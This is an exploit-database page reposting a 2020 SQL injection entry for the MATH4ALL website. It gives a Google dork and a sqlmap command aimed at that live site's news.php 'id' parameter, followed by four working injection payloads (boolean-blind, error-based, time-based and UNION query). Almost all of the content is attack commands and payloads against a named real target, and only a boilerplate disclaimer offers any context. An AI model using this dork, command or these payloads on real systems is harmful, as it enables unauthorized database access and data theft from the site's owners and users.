Advertisement






MATH4ALL - SQL Injection vulnerability

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-09-23
CVSS EPSS EPSSP
CVSS:4.0/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.0211 0.49283

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020090111

Below is a copy:

MATH4ALL - SQL Injection vulnerability
****************************
#Exploit Title: MATH4ALL - SQL Injection vulnerability
#Date: 2020-09-21
#Exploit Author: Mahdi Karimi
#Vendor Homepage: http://www.math4all.in
#Google Dork: news.php?id=6
#Tested On: windows 10


sqlmap:
sqlmap -u "http://www.math4all.in/news.php?id=6" --dbs
Testing Method;
- boolean-based blind
- UNION query
- error-based
- AND/OR time-based blind

Parameter: id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6' AND 9927=9927 AND 'MVTV'='MVTV

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=6' AND (SELECT 5358 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(5358=5358,1))),0x71626b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WsTI'='WsTI

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=6' AND SLEEP(5) AND 'Snog'='Snog

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-2383' UNION ALL SELECT NULL,CONCAT(0x7170706a71,0x7256496d4c456b7065444862686c47465641667047446f577a4b73447261654b4875495067775a74,0x71626b6a71),NULL,NULL,NULL,NULL-- IupF

**************************************************
#Discovered by: Mahdi Karimi
#Email : [email protected]
**************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum